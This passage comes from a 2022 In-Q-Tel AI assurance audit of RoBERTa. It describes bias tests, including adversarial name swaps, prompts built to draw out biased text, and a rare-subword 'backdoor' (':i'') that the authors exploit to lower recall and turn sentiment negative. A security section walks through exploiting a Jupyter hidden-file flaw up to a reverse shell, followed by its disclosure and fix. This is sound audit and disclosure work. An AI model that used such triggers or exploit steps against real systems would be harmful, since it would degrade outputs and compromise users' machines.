51 Effects that may occur when an algorithm learns from user or market behavior and feeds that behavior back into the model.
52 When training data contains a disproportionately low amount of data relating to marginalized groups.
53See. e.g., Jon Kleinberg, Sendhil Mullainathan, and Manish Raghavan, “Inherent Trade-Offs in the Fair Determination of Risk
Scores,” Preprint, submitted in 2016, available at https://arxiv.org/abs/1609.05807.
54For example, technical practitioners often fall prey to the McNamara Fallacy, or the belief that technical information is more
valuable than other information, or to technochauvinism, which is the belief that technology is always the solution. These human
biases often prevent the consideration of other obvious types of bias and harm, and can counteract process- or culture-based
mitigants, leading to a preference to pile on more technology in a space where overreliance on technology, or the views of a few
senior technicians, is likely already a problem.

© 2022 In-Q-Tel, Inc. 15 of 29




fi

fi


fi

fi


Statistical testing
If NER is structured as a binary classi cation task, statistical tests for adverse impact and differential va-
lidity can be conducted across named entities of different types or from different demographic
groups.55 Tests for adverse impact investigate differential rates of positive outcomes; these include ad -
verse impact ratio (AIR), standardized mean difference (SMD), and statistical signi cance testing on
group mean outcomes. Known thresholds associated with AIR, SMD, and statistical tests can then be
applied to assess the presence of (legally) impermissible bias. Tests for differential validity compare
performance quality (e.g., accuracy, true positive rate, false positive rate, etc.) across demographic
groups and similar thresholds can be applied to compare-to-control ratios (e.g., women-to-men, black-
to-white, etc.) in order to evaluate the presence of impermissible bias.

In the experiments described later in this section, we use a statistical testing approach to examine how
RoBERTa performs NER on person-entities identi ed by names common to different languages. This
approach could easily extend to other groups of people (such as those from different races) or to other
types of entities; for example, to attempt to determine whether certain types of organizations are iden-
ti ed as frequently as others.

Adversarial attacks
Adversarial attacks rely on perturbations of input data, including random perturbations, to assess bias
and harm. Examples relevant to LLMs and NER include:

●Hot ips, exchanging named entities in test data for named entities representing marginalized
groups and measuring model performance after the ip. We used this approach in our “Cross lin-
gual name swap” experiment (described below). The TextAttack library and AllenNLP interpret
module provide additional resources.56

●Prompt engineering, designing short input statements in an attempt to evoke biased responses.
Prompts such as: “The competent professional was …”; “She could be described as …”; or
“The disabled man …” can be fed into the text generation API of an LLM and term co-occurrence
and sentiment can be measured in the resulting text to assess bias. We used this approach in our
Sentiment Analysis experiment. The StereoSet and BOLD datasets provide additional resources.57

●Random attacks: Submitting random prompts into a text generation API may reveal dif cult to
foresee biases. While it’s logical to test for expected biases and harms, it may also be prudent to
acknowledge the possibility of surprise or unforeseen biases and harms in systems as complex as
contemporary LLMs. One of the few ways to test for unforeseen biases is to expose a system to
large quantities of random data, potentially even adversarial prompts generated by other LLMs.

55Following the bias testing approach we applied in our analysis of FakeFinder, described in the blog post: “AI Assurance: Do
deepfakes discriminate?,” In-Q-Tel (Feb. 1, 2022) available at https://www.iqt.org/ai-assurance-do-deepfakes-discriminate/.
56Yanjun Qi et al., “TextAttack,” GitHub (Version 0.3.4, 2021), available at https://github.com/QData/TextAttack; and Eric Wallace
et al., “AllenNLP Interpret: A Framework for Explaining Predictions of NLP Models,” AllenNLP (2019), available at https://al-
lenai.github.io/allennlp-website/interpret, respectively.
57Moin Nadeem and Siva Reddy, “StereoSet: A Measure of Bias in Language Models,” StereoSet, MIT, accessed May 16, 2022,
available at https://stereoset.mit.edu/; and Varun Kumar, “Amazon, Bias in Open-ended Language Generation Dataset (BOLD),”
GitHub (2021), available at https://github.com/amazon-research/bold, respectively.

© 2022 In-Q-Tel, Inc. 16 of 29


fi
fl

fi


fi
fl


fi
fi

Crowdsourcing & bug bounties


Because of the wide array of potential inputs, outputs, and applications, it is dif cult to test LLMs com-
prehensively for bias. Moreover, in real-world applications, biases and harms experienced by system
users tend to matter more than statistical ndings. For this reason, crowdsourcing could help to assess
vulnerabilities and biases that smaller development and data science teams might otherwise overlook.
While bug bounties are typically applied to discover security vulnerabilities, they can be used to nd
bias and harm in AI system outcomes. Twitter recently used bug bounties to con rm bias in its image
saliency algorithm58 and to nd novel types of bias and harm that were likely unknown to system de-
signers. Participants in the bug bounty identi ed expected biases toward younger, whiter, and more
female images, but also uncovered biases against memes written in non-Latin scripts and images con-
taining religious headdresses and camou age clothing. While we did not use this approach during this
audit, we view bias-focused bug bounties as a promising avenue for future work.

Experiment #1: Cross lingual name swap


Given the wide range of potential biases and harms that could be associated with LLMs, we had to
make some decisions about where to focus our bias testing efforts. We began with an experiment de-
signed to evaluate RoBERTa’s performance on the NER task across languages. For this experiment, we
used a NER dataset called protagonist tagger, 59 which includes labeled person-entities for 13 classic
English-language novels. We swapped out the labeled character names in this dataset for foreign lan-
guage names and measured RoBERTa’s recall on NER for person-entities. We de ned recall as the total
number of predicted correct entities divided by the total number of labeled entities. To look for indica-
tions of cross lingual bias, we then compared RoBERTa’s recall across languages.

The name-swapping was done randomly, with foreign language names from the Wikidata person
names dataset. 60 We used names from two sets of languages, a “common set” (Arabic, English, Span -
ish, French, Japanese, Korean, Russian, Turkish, and Chinese) and a “less common set" (which included
Amis, Finnish, Greek, Hebrew, Icelandic, Korean, and Saisiyat.) We measured bias, as is common in the
literature,61 by calculating the ratio of recall for a target group (e.g. Spanish) compared to recall for a
control group (for which we used English). We determined that bias was present if this ratio was out-
side of the range allowed by the four- fths rule 62 (that is, 0.8 to 1.2). We also used t-tests to measure
statistical signi cance, in an effort to determine if differences in recall scores across languages met the
criteria for bias, as de ned in courts of law.

58See HackerOne, “Twitter Algorithmic Bias,” HackerOne (July 2021), available at https://hackerone.com/twitter-algorithmic-
bias?type=team.
59Lajewska, W. & Wr’oblewska, A. (2021) Protagonists’ Tagger in Literary Domain - New Datasets and a Method for Person Entity
Linkage. ArXiv, abs/2110.01349
60 Wikipedia-persons-name. (2022) https://www.npmjs.com/package/wikidata-person-names. online
61Watkins, E., McKenna, M. & Chen, J. (2022) The Four-Fifths Rule is Not Disparate Impact: A Woeful Tale of Epistemic Trespass-
ing in Algorithmic Fairness. Parity Technologies, Inc., Technical Report ArXiv, abs/2202.09519.
62 https://www.law.cornell.edu/cfr/text/29/1607.4

© 2022 In-Q-Tel, Inc. 17 of 29



fi

fi
fi

fi
fl
fi

fi



fi
fi
fi

fi

Table 1 summarizes our initial results. In general, RoBERTa XLM-R large performed better than RoBERTa
XLM-R base. However, with the twin constraints of the four- fths rule criteria and statistical signi cance
(as indicated by a t-test) we did not nd any indication of cross language bias when RoBERTa was
used for NER across the “common set” of languages. The only bias we found was in relation to
Saisiyat (a language spoken in Taiwan).

Table 1: ML metrics for RoBERTa XLM base vs. large

Experiment #2: Subwords & random sequences


The results from Experiment #1 suggested a potential cause of bias — that RoBERTa’s recall might be
related to subword frequency. When using transformers in the context of multi-lingual NER tasks, to-
kens are words which can be entity names, entity words, or non entities. Words can also be broken up
into subwords (i.e. parts of words), which are obtained using different tokenization algorithms such as
SentencePiece63 or Byte Pair Encoding.64 These algorithms provide a vocabulary of tokens that are
used by the transformer model. We predicted that the presence of more common subwords would
lead to better recall (and therefore, less bias), whereas the existence of less frequent subwords might
lead to lower recall (and therefore, more bias).

To test this intuition, we hypothesized that the "son" subword token would have high frequency, since it
is common in English last names (Robertson, Peterson, Albertson, etc.). We concatenated this (subword
-> son) to all of the foreign language names, including the Saisiyat names, and reran NER. The recall
score for Saisiyat went up signi cantly, and hence, bias went down. This suggested that bias was di-
rectly related not to name frequency, but rather, to subword frequency. We further hypothesized
that infrequent subwords would result in lower recall scores and more bias. This insight led us to a
backdoor or “poisoning” approach: appending subword -> :i’ (a sequence of characters seen in
Saisiyat names) to the names of existing person-entities in the dataset.

Figure 1 shows recall scores, averaged across all 13 books in the protagonist tagger dataset, for base-
line names (in yellow), debiased names (names appended with subword -> son in green) and back-

63Kudo, T. (2018) Subword Regularization: Improving Neural Network Translation Models with Multiple Subword Candidates.
Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics pages 66-75. See also Kudo, T. &
Richardson, J. (2018) SentencePiece: A simple and language independent subword tokenizer and detokenizer for Neural Text
Processing. Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing: System Demonstrations
64Sennrich, R., Haddow, B. & Birch, A. (2016) Neural Machine Translation of Rare Words with Subword Units. Proceedings of the
54th Annual Meeting of the Association for Computational Linguistics Berlin, Germany, pages 1715–1725

© 2022 In-Q-Tel, Inc. 18 of 29



fi
fi



fi


fi

doored names (appended with subword -> :i’ in orange). The chart shows that recall scores went up
when subword -> son was concatenated to the end of names, whereas recall scores went down when
subword -> :i’ was added. We stress that we did not train this backdoor into the model (as is com-
mon in the literature) but rather, discovered that it was present and exploited it.

Figure 1: Recall scores (RoBERTa base XLM-R) after


debasing subword -> son and backdooring subword -> :i’

We then generated a new set of “names” from random sequences of characters and swapped these
into the data. (In this case, all names were 7 characters). NER results for these random sequences were
consistently lower than when using real names. Figure 2 shows a comparison of results for the random
sequences, the Saisiyat backdoor (subword -> :i’), and the original names in The Adventures of
Huckleberry Finn. We view this as further evidence that uncommon subwords (i.e. non-contextualized
tokens) are very important in the NER task. In general, most languages seem to follow common struc-

Figure 2: Summary of results for The Adventures of Huckleberry Finn

© 2022 In-Q-Tel, Inc. 19 of 29








tures and it seems that RoBERTa XLM is able to discern most person-entities regardless of lan-
guage. It is only when the model encounters uncommon subwords from a rare language (i.e.
Saisiyat) or when the names are from randomly generated subwords that RoBERTa begins to fail
in its inference.

Experiment #3: Sentiment analysis


In a third experiment, we used a combination of prompt engineering and sentiment analysis to further
examine our sets of cross language and subword-appended names. As an example, one of the
prompts used was <name> is carefully holding a <mask>. We substituted in names from different
languages and the mask replacements that RoBERTa generated were things like guns, babies, flow-
ers and swords. We used sentiment analysis to infer a value (between −1, 1) for each sentence, to in-
dicate a con dence score of a negative or positive sentiment, and then we averaged these scores
across all sentences for each language.

Our results indicated that RoBERTa had widely different sentiment for different languages and
that merely changing the language source for a name could cause the model to indicate different sen-
timent. We also saw that the use of the Saisiyat backdoor (subword -> :i’) had a major effect. In our
baseline test, only 5 out of 66 languages had a negative sentiment, but with the Saisiyat backdoor ap-
pended to names, all languages except for Indonesian received a negative sentiment score. In other
words, simply appending (subword -> :i’) to names from nearly any language caused RoBERTa to
yield a negative sentiment. This suggests that the model indicates negative sentiment when it en-
counters rare names, a nding that could indicate profound bias, depending on how the model
is used in production.

Table 2: Sentiment scores for selected languages


and the influence of adding subword -> :i’

© 2022 In-Q-Tel, Inc. 20 of 29


fi



fi





VIII. Security
This section includes ndings from two security-related audit activities: (1) a whole system analysis of
the RoBERTa model, accessed via a Jupyter Notebook; and (2) a review of third-party software depen-
dencies in the RoBERTa code base.

Whole system analysis


To assess security risks of AI/ML tools, it is important to consider the security of a whole system, rather
than merely assessing the security of an individual model. Recent incidents involving the technologies
used to build models, for example the “Python-based Ransomware Targeting JupyterLab Web Note-
books”65 covered recently by The Hacker News, underscore the importance of this philosophy. While
the target of this audit was Hugging Face's fork of the RoBERTa model, as we conducted the security
portion of this audit we broadened the scope to incorporate tools and technologies used to build
models like RoBERTa. Just as an attacker might Spear Phish66  system administrators to gain administra-
tive credentials or compromise a CI/CD pipeline to initiate a supply chain compromise, we wondered if
the working environment of data scientists represented a potential target for actors wishing to com-
promise or degrade ML models.

Jupyter Notebook and Jupyter Lab67 are tools widely used by data scientists to develop and debug
their models, in fact, many data scientists at IQT Labs make signi cant use of Jupyter Notebooks in per-
forming their work. Additionally, these tools are open source and well documented, allowing for more
streamlined analysis of their security. Our team knew of a cross site scripting (XSS) vulnerability in an
outdated version of Jupyter Notebook. 68 We chose this well publicized vulnerability in an older version
of Jupyter Notebook, CVE-2021-32798, as a logical starting point to show how an attacker could com-
promise a development environment in effort to impact an AI/ML model. Originally, we aimed to
demonstrate how this known vulnerability could be used to in uence models like RoBERTa, by com-
promising the development environment. (More speci cally, our goal was to embed an XSS payload
into a notebook that would then modify one of the .ipynb les contained in the directory.) However,
while working on this plan, the team discovered a new, previously unknown vulnerability: that it was
possible to use the Jupyter API to view or change les that should be hidden, provided that the
le names were known or could be determined. Depending on the le selected, malicious actors
could use this technique to gather sensitive information or gain and maintain unauthorized ac-
cess to a system.

65 https://thehackernews.com/2022/03/new-python-based-ransomware-targeting.html?m=1
66 https://www.trendmicro.com/vinfo/us/security/de nition/spear-phishing
67 https://jupyter.org/
68https://blog.jupyter.org/cve-2021-32797-and-cve-2021-32798-remote-code-execution-in-jupyterlab-and-jupyter-notebook-
a70fae0d3239

© 2022 In-Q-Tel, Inc. 21 of 29


fi


fi

fi


fi
fi
fi
fl
fi
fi


This vulnerability was assigned two CVE IDs: 69 CVE-2022-29238 and CVE-2022-29241,70 for Jupyter
Notebook and Jupyter Server, respectively; (both vulnerabilities map to  CWE 42571). Our team dis -
closed this issue to the Jupyter organization, following an industry standard disclosure plan (detailed
on page 26). Additionally, we worked with product owners at Jupyter to develop a x. This experience
led our team to create a set of best practices for using Jupyter Notebook and Jupyter Lab securely.

Background on Jupyter Notebook


Neither Jupyter Notebook nor JupyterLab is a standalone executable. Unlike a software tool such as
Microsoft Outlook, Jupyter applications instantiate a webserver and users interact with the application
through a web browser. The browser then interacts with the webserver and the Jupyter API72  to allow a
user to create and use “notebooks”. The Jupyter server has a number of different con guration op-
tions73 that users can set to tailor behavior to their needs, but it also has a set of basic defaults. Con g-
uration happens in a way that is transparent to the user, allowing for an experience that has the cross
platform capabilities of a browser but can be used in a way that feels like a native application. However,
this also leaves the system open to browser style attacks and vulnerabilities. While most applications
attempt to prevent arbitrary code execution, that is the entire point of Jupyter.

Vulnerability & Impact


By design, the Jupyter server is expected to be able to read and write les within the directory de ned
by the con guration value assigned to --notebook-dir (by default this will be the working directory
where the server is started). The user interface will not show hidden les or hidden directories; howev-
er, the API only applies protections at the directory level. If an attacker has access to the Jupyter system
and knows or can determine the path of a hidden le, then the Jupyter server can be used to read or
modify that le. The impact of this vulnerability can vary widely depending on the deployment sce-
nario. If Jupyter is running as an unprivileged user and --notebook-dir does not contain a user's
home directory, then the impact should be minimal. However, if a user starts the server from their
home directory and does not constrain the notebook directory, the consequences can be devastating.

A user's home directory should never be contained within the notebook directory. If a user starts
Jupyter from a home directory with no additional arguments, the Jupyter server will run with that user's
permissions and access to that directory. This gives an attacker several options: (1) If the user uses SSH
to access the machine where the Jupyter server is running (or any other machines), an attacker could
use this vulnerability to read/edit les like .ssh/id_rsa or .ssh/authorized_keys, providing access to
the machine in question and potentially others. (2) An attacker could also use this vulnerability to over-
write a user's .bashrc  le. This le is executed as a start up script when a user starts a new shell session
and can be used to compromise multiple kinds of system functionality. If an attacker is working within
the con nes of a compromised browser and token authentication is in use (the default), then the user
can attempt to read the le at /home/<user>/.local/share/jupyter/runtime/jpserver-

69 https://www.techtarget.com/searchsecurity/de nition/Common-Vulnerabilities-and-Exposures-CVE
70 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29241
71 https://cwe.mitre.org/data/de nitions/425.html
72 https://jupyter-server.readthedocs.io/en/latest/developers/rest-api.html
73 https://jupyter-server.readthedocs.io/en/latest/other/full-con g.html#other-full-con g

© 2022 In-Q-Tel, Inc. 22 of 29


fi
fi
fi

fi

fi
fi
fi
fi

fi

fi
fi


fi
fi
fi

fi
fi
fi

fi


<pid>.json which contains the access token. A special le called nbsignatures.db 74 is also stored in
the /home/<user>/.local/share/jupyter/ directory. This is a database le that is used to determine
what what notebooks and cells are trusted or untrustworthy. A sophisticated attacker could tamper with
this le, causing untrusted notebooks to become trusted or allowing execution patterns that would
normally be prevented.

Discovery
Our initial efforts focused on using the Contents API75  to read sensitive system level les such as /etc/
passwd or system logs. It was not possible to traverse the le system above the location de ned by
the notebook-dir assigned by the con guration, which in this case was the home directory of the
starting user. As a result, we shifted our efforts towards attempting to use the API to interact with sensi-
tive les within the starting user's home directory. With this approach, we were able to read the con-
tents of a user's home directory as well as the contents of the user's .bashrc  le. This le, while not
necessarily sensitive, is executed as a series of startup instructions any time the given user initiates a
new bash session. In practice, this means that if an attacker can gain control of this le they have a
mechanism to create a shell and gain persistence within a system. While we were able to read les
within the user context using the XSS vulnerability CVE-2021-32798, attempts to write modi ed les
back continually resulted in 403 responses.76 However, while attempting to read les via the API using
command line tools, we noticed that appending a token (supplied by the server at startup) as a url pa-
rameter would allow write operations to succeed. This is corroborated in Jupyter’s documentation.

We then found that if we applied the token for the current running instance as a string literal in an XSS
payload, we could successfully overwrite .bashrc. Next, we tried to ascertain the token without direct
access to the system. Knowing it was possible to read les using the API, we looked to see if the token
was stored in the le system in a location accessible by the API. When we used the command grep -iR
"<token> ./ 2>/dev/null" from the same directory where the notebook server was started, this re-
vealed that the token was stored in multiple les, one of which was in JSON format. This seemed a like-
ly target for continuing efforts, given javascript’s standard libraries for parsing and manipulating JSON
data. We retrieved the le and parsed out the token, but the le name contained a string of 5-6 digit
numbers that changed each time the notebook server was restarted. Since we couldn’t access the hid-
den lenames from the directory, we needed a way to determine these 5-6 digits in advance.77

Proof of Concept
One common way to identify les that belong to a speci c process is to give them a name that includes
the process ID (PID) of the owning process. By restarting the notebook server multiple times and run-
ning the command ps aux | grep jupyter we con rmed that the digits in the le name correspond-
ed to the PID of the notebook process. PIDs are a bounded construct; in theory, they run from 0 to

74 https://jupyter-notebook.readthedocs.io/en/stable/security.html#the-details-of-trust
75 https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html
76 https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403
77In Linux systems, le and directory names that begin with a period are hidden. The Contents API enables listing of directory
contents; however, attempting to list hidden directories always results in a 404 response. We veri ed the 404 response was
generic to hidden les across the system by creating a hidden directory with a xed lename and attempting to access it via the
API. The fact that listing hidden directories receives a “not found” reply even though les are retrieved, strongly suggested that
being able to view these les is unintended behavior.

© 2022 In-Q-Tel, Inc. 23 of 29


fi
fi
fi

fi
fi
fi


fi
fi

fi
fi
fi

fi

fi
fi
fi
fi
fi
fi
fi
fi
fi

fi
fi
fi
fi
fi
fi
fi
fi
fi
fi

fi


32768 for 32-bit systems or 4194304 for 64-bit systems. In practice, 0 is reserved for the kernel and is
only ever seen as a Parent Process ID (PPID) and the rst 1000 or so are generally some avor of system
level process. This means that the number of possible PIDs is large, but iterable, and a motivated at-
tacker could brute-force the overall lename. At this point, we updated the XSS payload to use what we
learned about retrieving les and scraping for the auth token. We retrieved the .bashrc  le and suc-
cessfully updated it with a line that spawned a reverse shell on a remote machine. We then used this to
steal (hypothetical) SSH credentials.

Remediation
After con rming the existence of this issue with the Verb is hidden allow hidden Response
maintainers of Jupyter, we undertook a root cause
analysis of the vulnerability. Through this we found GET TRUE TRUE -

that even though methods exposing directories had


GET TRUE FALSE 404
checks on whether a directory was hidden, methods
referencing les lacked these same checks. Initially, we GET FALSE TRUE -

focused on adding these checks to HTTP GET re-


GET FALSE FALSE -
quests, to prevent reading of hidden les. Subsequent
discussions with the project maintainers, however, re- PATCH TRUE TRUE -
vealed that this was necessary but not suf cient, as it
PATCH TRUE FALSE 400
still allowed overwriting. These conversations led to
the truth table shown on this page. PATCH FALSE TRUE -

As a practical matter, adding these checks involved PATCH FALSE FALSE -

modifying several methods spread across different


POST TRUE TRUE -
les. The nal implementation matrices are shown on
the following page. Jupyter maintainers requested POST TRUE FALSE 400
some edits to the status messages, to ensure that
POST FALSE TRUE -
none of the messages inadvertently exposed the state
of any les requested. After these changes were POST FALSE FALSE -
made, the patch was approved and packaged as a set
of security releases on June 7, 2022: PUT TRUE TRUE -

PUT TRUE FALSE 400


• Jupyter Notebook v6.4.12 
• Jupyter Server v1.17.1  PUT FALSE TRUE -

• Jupyter Server v2.0.0a1
PUT FALSE FALSE -

The attendant security advisories were published on DELETE TRUE TRUE -


June 14 2022:
DELETE TRUE FALSE 400
• Jupyter Notebook - GHSA-v7vq-3x77-87vg 
• Jupyter Server - GHSA-q874-g24w-4q9g DELETE FALSE TRUE -

DELETE FALSE FALSE -

© 2022 In-Q-Tel, Inc. 24 of 29


fi
fi
fi
fi
fi

fi

fi

fi

fi


fi


fl
fi

Jupyter Server 
FileContentsManager handlers.py
Method Response Method Response

_base_model 404 get 404

get 404 patch 400

save 400 post 400

delete_file 400 put 400

rename_file 400 delete 400

Jupyter Notebook 
FileContentsManager handlers.py
Method Response Method Response

_base_model 404 get 404

get 404 patch 400

save 400 post 400

delete_file 400 put 400

rename_file 400 delete 400

Jupyter Best Practices


When our team attempted to map the conditions necessary to turn this vulnerability into a viable ex-
ploit, we noted that con guration settings dictated prospects for exploitation. An attacker's ability to
do harm can be curtailed by choosing an appropriate directory out of which to host a notebook. Based
on this, we made several recommendations for improvements to Jupyter’s documentation. Additional-
ly, we recommend the following best practices when using Jupyter:
• Update to the latest version of Jupyter Notebook or JupyterLab
• Never set a the notebook directory as the le system root (C:\ or /) or to a directory that
contains users' home directories (C:\Users or /home)
• Never set the notebook directory to a directory that contains important operating system les
or binaries such as /etc, /bin, C:\windows, or C:\Program Files
• Avoid setting AllowRoot to true
• Limit the IP addresses from which the server is accessible to the greatest extent possible. Only
serving the application locally is preferred and the use of --ip='*' should be avoided.
• Use password authentication with a strong password whenever possible.

Conclusion
Finding new vectors of attack was not the original intent of this work. However, discovering vulnerabili-
ties is an occupational hazard of assurance auditing and developing policies and procedures to guide
disclosure and remediation efforts is an inevitable part of the maturation of machine learning ecosys-
tems. It is our hope that the work outlined here can help others struggling with when and how to dis-
close vulnerabilities discovered as a byproduct of auditing activities.

© 2022 In-Q-Tel, Inc. 25 of 29









fi


fi


fi

Public disclosure process & timeline
Upon discovering these issues, our team followed an industry-standard disclosure policy, summarized
below. We’ve also provided a timeline of discovery, disclosure & remediation as a reference.

1. Finalize proof of concept code and steps to reproduce.


2. Communicate the nature of the vulnerability and steps to reproduce to Jupyter's security appa-
ratus in accordance with their security guidelines.
3. Upon con rmation of receipt, le for a CVE with GitHub to allow for independent veri cation of
the vulnerability.
4. Create potential patches/ xes and offer them to the maintainers for discussion and review.
5. Observe a 60-90 day embargo period to allow for remediation of the vulnerability.

04/25/2022 Initial discovery of token leak

04/26/2022 Scoping and Mapping of vulnerability

04/27/2022 XSS POC completed

04/28/2022 Internal Disclosure discussion

04/28/2022 Discussion with legal counsel

05/04/2022 Presentation to project partners

05/09/2022 Initial Email to IPython security

05/10/2022 Jupyter Notebook GitHub security advisory opened

05/18/2022 Intital fix proposed

05/19/2022 Jupyter Server Github security advisory opened

05/19/2022 Jupyter Notebook CVE Requested

05/19/2022 Jupyter Server CVE Requested

05/19/2022 CVE-2022-29238 For Jupyter Notebook issued

05/19/2022 CVE-2022-29241 For Jupyter Notebook issued

05/20/2022 Revision 2 of fix provided for Notebook

05/23/2022 Initial proposal of fix for Jupyter Server (ported from rev 2 of Notebook fix) offered to maintainers

05/25/2022 Minor changes requested by maintainers

05/25/2022 Changes submitted to maintainers

06/02/2022 Changes to Jupyter Notebook approved

06/07/2022 Jupyter Notebook v6.4.12 released

06/07/2022 Jupyter Server v1.17.1 and v2.0.0a1 released

06/07/2022 Jupyter Server v1.17.1 and v2.0.0a1

06/14/2022 Jupyter Notebook security advisory published

06/14/2022 Jupyter Server security advisory published

© 2022 In-Q-Tel, Inc. 26 of 29


fi


fi
fi





fi


Third-party software dependencies
To run Hugging Face’s RoBERTa-base and RoBERTa-large models, users need to install 65 third-party
software packages, or direct dependencies, on their infrastructure. We collected the most recent de-
pendency information (as of February 2022) from a publicly available setup.py le on Hugging Face’s
GitHub repository. Using this data, we generated a RoBERTa-speci c Open Source Software “Nutrition
Label,”78 which appears in the gure below. Built to support analysis of third-party package dependen-
cies, this Nutrition Label visualization allows users to see multiple types of open source software pack-
age metadata in a single view.

The visualization lists each package dependency in


the rst column (Package Name), along with its corre-
sponding License Type and Snyk Health Score. This
score indicates a package’s relative health and robust-
ness on a scale from 0 to 100 (in this case, displayed in
descending order). The Package Maintenance column
indicates whether maintainers receive funding to per-
form ongoing security patches and basic upkeep.

The overwhelming majority (50/65) of the RoBERTa


dependencies we scanned had a Snyk Health Score of
80 or higher, with a mean score of 85.73 and a median
of 89. Given these relatively high scores, very few
packages raised concern upon initial inspection. The
distribution of health scores also made it easy to focus
on areas of concern. For example, when we examined
the lowest-scoring package, ipadic, we encountered
this warning in the documentation on GitHub:
You Shouldn't Use This
This … hasn't been updated since at least 2007. The organization that
created it no longer does this kind of work. The contact URLs listed in the
source no longer resolve. It doesn't contain important recent terms like
令和, the current era name. Instead you should use Unidic, which is main-
tained by NINJAL. This package is provided for compatability [sic] with
old benchmarks or models.

By gathering the Snyk data, sorting RoBERTa’s pack-


age dependencies based on health score, and select-
ing the lowest scoring packages for closer inspection,
we identi ed a software dependency at risk of soft-
ware supply chain attacks 79 like typosquatting or de-
pendency hijacking, which tend to target packages

78 For more information on how IQT Labs developed this interface in the context of our previous AI Assurance Audit of FakeFind-
er, visit: https://www.iqt.org/open-source-software-nutrition-labels-an-ai-assurance-application/
79Dan Geer, Bentz Tozer, and John Speed Meyers, “Counting Broken Links: A Quant’s View of Software Supply Chain Security,” in
USENIX ;login: Vol. 45, No. 4 (Winter 2020).

© 2022 In-Q-Tel, Inc. 27 of 29


fi
fi

fi


fi

fi

that have not been updated in many years.80 This illustrates how analyzing an AI model's codebase can
help identify potential security risks associated with real-world software package dependencies.

Health Score Comparisons to Past AI Assurance Work


Since this was our fourth Snyk-based “health scan” of open source code repositories, we were able to
leverage our earlier analyses for comparison. In contrast to previous dependency scans of IQT Labs'
FakeFinder project, the Anaconda Python ecosystem, and the entire Julia Language universe, RoBERTa
contains fewer dependencies. Additionally, the dependencies attained slightly higher Snyk Advisor
Health Scores and received more recent updates from a higher average number of contributors and
maintainers. These attributes are associated with high-quality codebases.

80 Dan Geer, “On Abandonment” in IEEE Security & Privacy, vol. 11, no. 04, pp. 96, 2013. doi: 10.1109/MSP.2013.92

© 2022 In-Q-Tel, Inc. 28 of 29






IX. Next steps & future work

• Conduct a third audit, of an AI tool built from low cost “maker” hardware. Our third AI assurance
audit will focus on risks posed by hardware & rmware. We plan to focus on SkyScan, an IQT Labs-
built prototype system that collects and auto-labels training data needed to build a computer vision
tool to identify airplanes. For this audit, we will adapt our approach to identify risks related to the use
of low-cost “maker” hardware and the ingestion of radio frequency (RF) signals.

• Develop interactive training and education materials to teach others about issues and themes
related to AI Assurance. In the coming year we plan to develop materials to support an Incident
Response-style tabletop exercise, based on the following scenario & injects: A deep fake detector
that has already been deployed is reported to have bias concerns. A data scientist from a minority
group tested the system on herself for fun and reported the issue. Inject: Additional aws are found
with the system that suggest it suffers from serious performance issues, like shortcut learning, which
undermine its analytical soundness. Inject: Unfortunately, the system was relied upon for a signi cant
downstream analytical product that has already been briefed to senior decision-makers, giving rise to
the dif cult decision about whether and how to correct intelligence assessed on the basis of this sys-
tem. Our aim is to help data scientists and analysts understand challenges related to assuring AI/ML
systems and think through incident response strategies.

• Expand bias testing of RoBERTa to examine performance on the NER task for entities that be-
long to historically marginalized groups. Extending the experiments discussed in this report, we
plan to test for bias in NER related to some of the marginalized groups discussed in our high level
bias testing plan (for example: gender, race, and potentially age).

• Continue our efforts to test and evaluate the utility of existing auditing tools, to understand
how they can support AI assurance efforts and provide transparency. During this audit we began
exploring how products developed by Robust Intelligence and Fiddler AI can support assurance au-
diting and provide transparency into LLMs like RoBERTa. Robust Intelligence’s RIME platform pro-
vides tools for conducting AI stress testing and creating an AI Firewall to protect deployed models
from attack. Fiddler AI provides a platform for continuous monitoring and performance analysis for AI
models. Together, these tools can provide insight into model trustworthiness, veri ability and ex-
plainability, but further exploration is needed. As part of this effort, we will also look at open source
tools and resources that provide different types of transparency (for example, Model Cards,
Datasheets, Open Source Nutrition Labels, and Data Hazard Labels). 

© 2022 In-Q-Tel, Inc. 29 of 29


fi

fi






fi
fl
fi

APPENDIX A
Responses to questions from the AI Ethics Frame-
work for the IC

ETHICS | Understanding Goals and Risks


What is the goal you are trying to achieve by creating this AI, including components used in AI develop-
ment? Is there a need to use AI to achieve this goal? Can you use other non-AI related methods to achieve
this goal with lower risk? Is AI likely to be effective in achieving this goal?

For the purposes of this audit, we have imagined a hypothetical use case for RoBERTa, a large language model.
That use case is Named Entity Recognition (NER), an information extraction task where a model is used to auto-
mate the identi cation of entities (i.e. person names, organizations, locations, etc.) that appear within a corpus of
unstructured text. For example, if we used RoBERTa for NER on the sentence: “Andrea’s birthday is March
17” we would expect RoBERTa to identify “Andrea” as a named entity. This task could be performed by a per-
son; however, there are signi cant bene ts to automation. Using a model such as RoBERTa would enable much
more scalability, i.e. the ability to identify entities in a massive corpus of text data quickly.

Are there speci c AI system methods suitable and preferred for this use case? Does the ef ciency and reli-
ability of the AI in this particular use case justify its use for this purpose?

In our response to the previous question, we viewed NER as our “use case” or “goal.” In light of this question, per-
haps we should have stated the “goal” as identifying key entities in a large corpus of text and NER as a “speci c AI
system method” that is preferred for this use case.

What bene ts and risks, including risks to civil liberties and privacy, might exist when this AI is in use? Who
will bene t? Who or what will be at risk? What is the scale of each and likelihood of the risks? How can
those risks be minimized and the remaining risks adequately mitigated? Do the likely negative impacts
outweigh likely positive impacts?

The bene ts of automating this task are operational ef ciency. That is, the ability to identify entities in a massive
corpus of text data much more quickly than could be done by humans. We used an ethical matrix to think through
and anticipate various risks posed to different stakeholders. Please see page 13 of this report. It is quite dif cult to
quantify the scale or likelihood of these risks, but we have done a signi cant amount of bias testing, to character-
ize ways in which the model might perform differently across entities identi ed by names from various languages.
One general recommendation we make is to ne-tune the model on a dataset that is as representative as possible
of the data on which the model will ultimately be used.

What performance metrics best suit the AI, such as accuracy, precision, and recall, based on risks deter-
mined by mission managers, analysts, and consumers given the potential risks; and how will the accuracy
of the information be provided to each of those stakeholders? What impacts could false positive and false
negative rates have on system performance, mission goals, and affected targets of the analysis?

We have concentrated on understanding recall, the total number of predicted correct entities divided by the total
number of labeled entities. To look for indications of bias, we compared RoBERTa’s recall across languages. In our
